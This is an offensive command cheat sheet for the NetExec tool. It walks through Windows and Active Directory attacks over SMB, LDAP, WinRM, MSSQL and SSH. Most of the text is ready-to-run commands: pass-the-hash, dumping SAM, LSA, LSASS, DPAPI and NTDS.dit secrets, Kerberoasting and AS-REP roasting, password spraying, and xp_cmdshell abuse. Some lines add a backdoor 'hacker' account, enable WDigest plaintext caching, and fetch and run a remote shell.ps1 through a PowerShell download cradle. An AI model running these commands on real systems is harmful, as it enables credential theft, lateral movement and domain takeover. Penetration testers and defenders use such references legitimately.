NetExec (nxc)
NetExec is the actively maintained successor to CrackMapExec. It speaks SMB, LDAP, WinRM, MSSQL, SSH, RDP, FTP, and more: use it for credential validation, enumeration, lateral movement, and post-exploitation across an entire subnet in one command.
# Install / update
pipx install netexec
pipx upgrade netexec
# List all available modules for a protocol
nxc smb -L
nxc ldap -L
# Get options for a specific module
nxc smb -M lsassy --optionsSMB
SMB is the primary protocol for Windows enumeration and lateral movement. Start unauthenticated to see what's exposed, then escalate to authenticated enumeration once you have credentials.
Host Discovery
Sweep a subnet to find live Windows hosts and identify domain membership, OS version, and SMB signing status.
nxc smb 192.168.1.0/24 # discover all SMB hosts on subnet
nxc smb 192.168.1.0/24 --gen-relay-list relay.txt # output hosts with signing disabled (relay targets)
nxc smb targets.txt # read targets from fileNull and Guest Sessions
Test for unauthenticated access before using credentials: null sessions often expose user lists and share names.
nxc smb <ip> -u '' -p '' # null session
nxc smb <ip> -u 'guest' -p '' # guest account (often enabled)
nxc smb <ip> -u '' -p '' --shares # enumerate shares via null session
nxc smb <ip> -u '' -p '' --users # list users via null session
nxc smb <ip> -u '' -p '' --pass-pol # dump password policy (check lockout threshold)Credential Validation
A (+) or [+] in the output means the credential is valid. Pwn3d! means you have admin rights on that host.
nxc smb <ip> -u user -p 'Password123' # basic auth check
nxc smb <ip> -u user -p 'Password123' --local-auth # auth against local SAM (not domain)
nxc smb <ip> -u user -H <NThash> # pass-the-hash
nxc smb <ip> -u user -H <NThash> --local-auth # PTH against local account
nxc smb <ip> -u user --use-kcache # use active Kerberos ticket (KRB5CCNAME must be set)
nxc smb <ip> -u user -p pass -d domain.local # specify domain explicitly
nxc smb <ip> -u user -p pass --kdcHost dc01 # specify KDC for KerberosShare Enumeration
List all shares and their access level: look for non-default shares like backup, data, scripts, IT.
nxc smb <ip> -u user -p pass --shares # list shares + read/write access
nxc smb <ip> -u user -p pass --disks # list local disks on the targetShare Spidering
Recursively enumerate file contents across all shares: outputs a JSON map of every readable file path.
nxc smb <ip> -u user -p pass -M spider_plus # spider all readable shares
nxc smb <ip> -u user -p pass -M spider_plus -o SHARE=Data # spider specific share
nxc smb <ip> -u user -p pass -M spider_plus -o READ_ONLY=false # also download files
nxc smb <ip> -u user -p pass -M spider_plus -o EXCLUDE_EXTS=exe,dll # skip binary files
nxc smb <ip> -u user -p pass -M spider_plus -o PATTERN=password # flag files matching patternFile Operations
Download or upload files directly over SMB without a separate tool.
nxc smb <ip> -u user -p pass --get-file '\\share\path\file.txt' ./local_file.txt # download
nxc smb <ip> -u user -p pass --put-file ./local.txt '\\share\path\remote.txt' # uploadUser and Group Enumeration
Pull users, groups, logged-on sessions, and local admins from the target.
nxc smb <ip> -u user -p pass --users # list domain users (via SAM/SAMR)
nxc smb <ip> -u user -p pass --groups # list domain groups
nxc smb <ip> -u user -p pass --local-groups # list local groups on target
nxc smb <ip> -u user -p pass --loggedon-users # show currently logged-on users
nxc smb <ip> -u user -p pass --sessions # show active SMB sessions
nxc smb <ip> -u user -p pass --pass-pol # dump domain password policyRID Brute Force
Enumerate accounts by brute-forcing RIDs over SAMR: works even when --users is restricted, and finds local accounts too.
nxc smb <ip> -u user -p pass --rid-brute # brute RIDs 500-4000 (default)
nxc smb <ip> -u user -p pass --rid-brute 10000 # brute RIDs up to 10000
nxc smb <ip> -u '' -p '' --rid-brute # attempt via null sessionCommand Execution
Run commands on the remote host: -x uses cmd.exe, -X uses PowerShell. Requires admin rights.
nxc smb <ip> -u user -p pass -x 'whoami /all' # cmd.exe execution
nxc smb <ip> -u user -p pass -X 'Get-Process' # PowerShell execution
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method wmiexec # use WMI (no service creation)
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method mmcexec # use MMC (stealthy)
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method smbexec # use SMB pipe (no binary)
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method atexec # use task scheduler
nxc smb <ip> -u user -p pass --no-output -x 'net user hacker Pass123! /add' # suppress outputCredential Dumping
Dump credential stores from the target: all require admin rights. Prefer lsassy over --sam when possible as it handles protections better.
# SAM database (local account hashes)
nxc smb <ip> -u user -p pass --sam
# LSA secrets (service account creds, DPAPI keys, cached domain hashes)
nxc smb <ip> -u user -p pass --lsa
# LSASS via lsassy module (handles multiple dump methods automatically)
nxc smb <ip> -u user -p pass -M lsassy
nxc smb <ip> -u user -p pass -M lsassy -o METHOD=comsvcs # use comsvcs.dll
nxc smb <ip> -u user -p pass -M lsassy -o METHOD=procdump # use procdump.exe (upload required)
nxc smb <ip> -u user -p pass -M lsassy -o METHOD=nanodump # use nanodump (EDR evasion)
# DPAPI secrets (browser saved passwords, credential manager)
nxc smb <ip> -u user -p pass -M dpapi # dump all DPAPI secrets
nxc smb <ip> -u user -p pass -M dpapi -o MKFILE=masterkeys.txt # use pre-dumped masterkeys
# NTDS.dit via ntdsutil (DC only: uses IFM to extract)
nxc smb <dc-ip> -u admin -p pass -M ntdsutil
# Backup Operator privilege abuse (dump SAM/SYSTEM/SECURITY via backup rights)
nxc smb <dc-ip> -u backup_user -p pass -M backup_operatorHost Information
Pull system info and generate a hosts file for internal network mapping.
nxc smb <ip> -u user -p pass --generate-hosts-file hosts.txt # write /etc/hosts-format file
nxc smb 192.168.1.0/24 -u user -p pass --generate-hosts-file internal_hosts.txtPassword Change
Change passwords via SMB: useful for self-service changes or when you have ForceChangePassword on another account.
# Change your own password (knows current)
nxc smb <ip> -u user -p 'OldPass' -M change-password -o NEWPASS='NewPass123!'
# Change own password using hash (PTH self-service)
nxc smb <ip> -u user -H <NThash> -M change-password -o NEWPASS='NewPass123!'
# Force change another user's password (requires ForceChangePassword ACE)
nxc smb <ip> -u attacker -p pass -M change-password -o USER=target NEWPASS='NewPass123!'
# Force change using hash
nxc smb <ip> -u attacker -H <NThash> -M change-password -o USER=target NEWPASS='NewPass123!'Miscellaneous SMB Modules
Additional recon and abuse modules useful during post-exploitation.
nxc smb <ip> -u user -p pass -M wdigest -o ACTION=enable # enable WDigest (plaintext in LSASS)
nxc smb <ip> -u user -p pass -M wdigest -o ACTION=disable # disable WDigest
nxc smb <ip> -u user -p pass -M web_delivery -o URL=http://<ip>/shell.ps1 # trigger download cradle
nxc smb <ip> -u user -p pass -M empire_exec -o LISTENER=http AGENT=<agent> # Empire exec
nxc smb <ip> -u user -p pass -M coerce_plus # test coercion methods (printerbug, petitpotam, etc.)
nxc smb <ip> -u user -p pass -M runasppl # check RunAsPPL (LSASS protection)
nxc smb <ip> -u user -p pass -M uac # check UAC configuration
nxc smb <ip> -u user -p pass -M rdp -o ACTION=enable # enable RDP
nxc smb <ip> -u user -p pass -M rdp -o ACTION=disable # disable RDPLDAP
LDAP is the primary channel for querying Active Directory. Use it for targeted attribute enumeration, BloodHound collection, and Kerberos-based attacks.
Credential Validation
Validate domain credentials against the DC via LDAP: lighter than SMB and works even when SMB is firewalled.
nxc ldap <dc-ip> -u user -p 'Password123' # basic LDAP auth check
nxc ldap <dc-ip> -u user -H <NThash> # PTH via LDAP
nxc ldap <dc-ip> -u user --use-kcache # use Kerberos ticketUser Enumeration
Pull user accounts and attributes directly from the directory.
nxc ldap <dc-ip> -u user -p pass --users # list all domain users
nxc ldap <dc-ip> -u user -p pass --users --no-sort # preserve LDAP order
nxc ldap <dc-ip> -u user -p pass --groups # list all domain groups
nxc ldap <dc-ip> -u user -p pass --computers # list all computer accounts
nxc ldap <dc-ip> -u user -p pass --admin-count # find accounts with adminCount=1 (sensitive accounts)
nxc ldap <dc-ip> -u user -p pass --password-not-required # find accounts with PASSWD_NOTREQD flag
nxc ldap <dc-ip> -u user -p pass --trusted-for-delegation # find unconstrained delegation accounts
nxc ldap <dc-ip> -u user -p pass --subnets # list AD subnets (for network mapping)Description Field Mining
The get-desc-users module reads every user's Description field: admins commonly store passwords there as "notes".
nxc ldap <dc-ip> -u user -p pass -M get-desc-users # dump all account Description fields
nxc ldap <dc-ip> -u user -p pass -M get-desc-users -o KEYWORDS=pass,pwd,cred # filter by keywordCustom LDAP Queries
Run arbitrary LDAP filters to extract any attribute from any object class.
# Full attribute dump for matching objects
nxc ldap <dc-ip> -u user -p pass --query "(sAMAccountType=805306368)" "*" # all user objects, all attrs
# Selected attributes only
nxc ldap <dc-ip> -u user -p pass --query "(sAMAccountType=805306368)" "sAMAccountName,description,memberOf"
# Accounts with SPN set (Kerberoastable)
nxc ldap <dc-ip> -u user -p pass --query "(&(sAMAccountType=805306368)(servicePrincipalName=*))" "sAMAccountName,servicePrincipalName"
# Accounts with pre-auth disabled (AS-REP roastable)
nxc ldap <dc-ip> -u user -p pass --query "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" "sAMAccountName"
# Accounts with PASSWD_NOTREQD
nxc ldap <dc-ip> -u user -p pass --query "(userAccountControl:1.2.840.113556.1.4.803:=32)" "sAMAccountName"
# Computers with unconstrained delegation (excluding DCs)
nxc ldap <dc-ip> -u user -p pass --query "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))" "name,dNSHostName"
# Find dMSA objects (Windows Server 2025 BadSuccessor)
nxc ldap <dc-ip> -u user -p pass --query "(objectClass=msDS-DelegatedManagedServiceAccount)" "name,msDS-ManagedAccountPrecededByLink"Group Membership
Check which groups a specific user belongs to: useful for understanding what access a compromised account has.
nxc ldap <dc-ip> -u user -p pass -M groupmembership -o USER=target_user # list groups for user
nxc ldap <dc-ip> -u user -p pass -M groupmembership -o GROUP="Domain Admins" # list members of groupBloodHound Collection
Collect all AD relationship data in BloodHound format: import the zip into BloodHound CE for graph analysis.
nxc ldap <dc-ip> -u user -p pass --bloodhound -c all # collect all BloodHound data
nxc ldap <dc-ip> -u user -p pass --bloodhound -c DCOnly # DC-only collection (faster, less noise)
nxc ldap <dc-ip> -u user -p pass -M bloodhound -o COLLECTION=all # module alternative
nxc ldap <dc-ip> -u user -p pass -M bloodhound -o COLLECTION=all,LoggedOn # include logged-on usersKerberoasting
Request TGS tickets for all SPN-registered accounts: output is in hashcat format ready for offline cracking.
nxc ldap <dc-ip> -u user -p pass --kerberoast hashes.txt # request all kerberoastable TGS hashes
nxc ldap <dc-ip> -u user -H <NThash> --kerberoast hashes.txt # PTH version
# Crack: hashcat -m 13100 hashes.txt rockyou.txtAS-REP Roasting
Request AS-REP for accounts with pre-authentication disabled: works without credentials if you have a username list.
nxc ldap <dc-ip> -u user -p pass --asreproast hashes.txt # authenticated, auto-discovers targets
nxc ldap <dc-ip> -u '' -p '' --asreproast hashes.txt # unauthenticated (null session)
nxc ldap <dc-ip> -u users.txt -p '' --asreproast hashes.txt # test specific user list
# Crack: hashcat -m 18200 hashes.txt rockyou.txtLAPS Passwords
Retrieve LAPS-managed local admin passwords: the ms-Mcs-AdmPwd attribute is readable by accounts explicitly granted access.
nxc ldap <dc-ip> -u user -p pass --laps # dump all LAPS passwords you can read
nxc ldap <dc-ip> -u user -p pass -M laps # module variant
nxc ldap <dc-ip> -u user -p pass --laps --computer DC01 # LAPS for specific computergMSA Passwords
Retrieve Group Managed Service Account passwords: requires membership in the account's PrincipalsAllowedToRetrieveManagedPassword group.
nxc ldap <dc-ip> -u user -p pass -M gmsa # retrieve all readable gMSA passwordsLDAP Security Checks
Check whether the DC enforces LDAP signing and channel binding: if not enforced, LDAP relay attacks are possible.
nxc ldap <dc-ip> -u user -p pass -M ldap-checker # check signing + channel binding enforcement
nxc ldap <dc-ip> -u '' -p '' -M ldap-checker # also test without credentialsMachine Account Quota
Check how many machine accounts unprivileged users can create: if above 0, RBCD and other attacks requiring a computer account become trivial.
nxc ldap <dc-ip> -u user -p pass -M maq # read ms-DS-MachineAccountQuotaWinRM
WinRM (port 5985 HTTP, 5986 HTTPS) provides remote PowerShell access. Requires the account to be in the Remote Management Users group or a local admin.
Credential Validation
A (+) response confirms WinRM access: Pwn3d! is not shown for WinRM since access itself implies admin-equivalent rights.
nxc winrm <ip> -u user -p pass # validate WinRM access
nxc winrm <ip> -u user -H <NThash> # PTH via WinRM
nxc winrm <ip> -u user --use-kcache # Kerberos ticket auth
nxc winrm <ip> -u user -p pass --ssl # HTTPS (port 5986)Command Execution
-x runs a raw command, -X runs PowerShell: both return output inline.
nxc winrm <ip> -u user -p pass -x 'whoami /all' # cmd.exe command
nxc winrm <ip> -u user -p pass -X 'Get-Process | Select-Object Name,Id' # PowerShell command
nxc winrm <ip> -u user -p pass -X 'IEX(New-Object Net.WebClient).DownloadString("http://<ip>/shell.ps1")'MSSQL
MSSQL (default port 1433) is worth checking for weak auth and code execution via xp_cmdshell. Test Windows auth first, then SQL auth.
Authentication
Try Windows auth with -windows-auth before SQL auth: service accounts and domain users often have SQL access via their domain credentials.
nxc mssql <ip> -u user -p pass # SQL auth
nxc mssql <ip> -u user -p pass -windows-auth # Windows/Kerberos auth
nxc mssql <ip> -u user -H <NThash> -windows-auth # PTH with Windows auth
nxc mssql <ip> -u sa -p '' -windows-auth # blank sa password check
nxc mssql 192.168.1.0/24 -u sa -p sa # spray subnet for weak SA credsQuery Execution
Run arbitrary T-SQL queries: useful for enumerating linked servers, database contents, and permissions.
nxc mssql <ip> -u user -p pass -q "SELECT @@version" # server version
nxc mssql <ip> -u user -p pass -q "SELECT name FROM master.dbo.sysdatabases" # list databases
nxc mssql <ip> -u user -p pass -q "SELECT name FROM master..syslogins" # list SQL logins
nxc mssql <ip> -u user -p pass -q "SELECT * FROM openquery([linked_srv], 'SELECT @@version')" # linked server query
nxc mssql <ip> -u user -p pass -q "EXEC sp_linkedservers" # enumerate linked servers
nxc mssql <ip> -u user -p pass -q "SELECT IS_SRVROLEMEMBER('sysadmin')" # check sysadminxp_cmdshell
Enable and abuse xp_cmdshell for OS command execution: requires sysadmin or equivalent rights.
nxc mssql <ip> -u user -p pass -x 'whoami' # auto-enables xp_cmdshell, runs cmd, disables after
nxc mssql <ip> -u user -p pass -x 'whoami' --no-output # suppress output (for blind execution)
# Manual xp_cmdshell enablement via query
nxc mssql <ip> -u user -p pass -q "EXEC sp_configure 'show advanced options',1; RECONFIGURE"
nxc mssql <ip> -u user -p pass -q "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
nxc mssql <ip> -u user -p pass -q "EXEC xp_cmdshell 'whoami'"SSH
SSH is less common in Windows AD environments but frequently found in Linux targets reachable from a Windows pivot, and in some mixed-OS environments.
Authentication and Execution
Test credentials and run commands: supports password auth, key auth, and Kerberos where configured.
nxc ssh <ip> -u user -p pass # password auth
nxc ssh <ip> -u user --key-file ~/.ssh/id_rsa # private key auth
nxc ssh <ip> -u user -p pass -x 'id; hostname' # command execution
nxc ssh <ip> -u user -p pass -x 'sudo -l' # check sudo rights
nxc ssh 192.168.1.0/24 -u root -p 'password' -x 'id' # sweep subnetPassword Spraying
Spray one password across many accounts: always check --pass-pol first to get the lockout threshold. Default approach: one password per user per spray cycle, wait between cycles.
# Single password against a user list
nxc smb <ip> -u users.txt -p 'Password123' --continue-on-success # don't stop on first hit
# Single user against a password list (standard bruteforce)
nxc smb <ip> -u administrator -p passwords.txt --continue-on-success
# 1:1 user:pass list (no cross-product bruteforce)
nxc smb <ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Multiple passwords: pair carefully with lockout policy
nxc smb <ip> -u users.txt -p 'Winter2024!' --continue-on-success
nxc smb <ip> -u users.txt -p 'Spring2024!' --continue-on-success
# LDAP spray (quieter, Kerberos-based, doesn't hit SMB)
nxc ldap <dc-ip> -u users.txt -p 'Password123' --continue-on-success
# Kerbrute-style via nxc (Kerberos pre-auth based)
nxc smb <ip> -u users.txt -p 'Password123' --continue-on-success -d domain.local --kdcHost <dc>Global Flags Reference
These flags apply across all protocols and control auth method, threading, and output behavior.
# Authentication
-u <user> # username (file or single value)
-p <pass> # password (file or single value)
-H <hash> # NTLM hash (LM:NT or :NT format)
-d <domain> # domain name
--local-auth # authenticate against local accounts
--use-kcache # use Kerberos ccache (requires KRB5CCNAME env var)
--kdcHost <host> # specify KDC hostname for Kerberos
--aes-key <key> # AES Kerberos key
# Targeting
-t <threads> # number of parallel threads (default: 100)
--timeout <seconds> # connection timeout per host (default: 5)
--port <port> # custom port
# Credential spraying
--continue-on-success # don't stop after first valid credential found
--no-bruteforce # pair users and passwords 1:1 (no cross-product)
# Output and logging
--verbose # show more detail including errors
--debug # full debug output
--log <file> # write output to file
-o <key=value> # pass options to module
# Modules
-M <module> # run a module
-L # list available modules for this protocol
--options # show options for selected moduleUseful Module Reference
| Module | Protocol | What it does |
|---|---|---|
spider_plus | SMB | Recursively maps all readable shares to JSON, optionally downloads files |
lsassy | SMB | Dumps LSASS memory remotely using multiple selectable methods |
dpapi | SMB | Extracts DPAPI-protected secrets (browser passwords, Credential Manager) |
ntdsutil | SMB | Dumps NTDS.dit via ntdsutil IFM method (DC only) |
backup_operator | SMB | Abuses Backup Operator rights to extract SAM/SYSTEM/SECURITY hives |
change-password | SMB | Changes a user password via SMB (self or ForceChangePassword) |
wdigest | SMB | Enables or disables WDigest plaintext caching in LSASS |
coerce_plus | SMB | Tests various coercion primitives (PrinterBug, PetitPotam, DFSCoerce, etc.) |
laps | LDAP | Reads LAPS-managed local admin passwords from ms-Mcs-AdmPwd |
gmsa | LDAP | Retrieves Group Managed Service Account passwords |
get-desc-users | LDAP | Dumps the Description field of all user accounts (often contains passwords) |
groupmembership | LDAP | Lists members of a group or groups a specific user belongs to |
ldap-checker | LDAP | Checks LDAP signing and channel binding enforcement on the DC |
bloodhound | LDAP | Collects BloodHound-format AD data for graph import |
maq | LDAP | Reads ms-DS-MachineAccountQuota (affects RBCD attack feasibility) |
rdp | SMB | Enables or disables Remote Desktop on the target |
runasppl | SMB | Checks whether RunAsPPL (LSASS Protected Process) is enabled |
uac | SMB | Reads UAC configuration flags on the target |
webdav | SMB | Checks if WebDAV (WebClient service) is running on the target |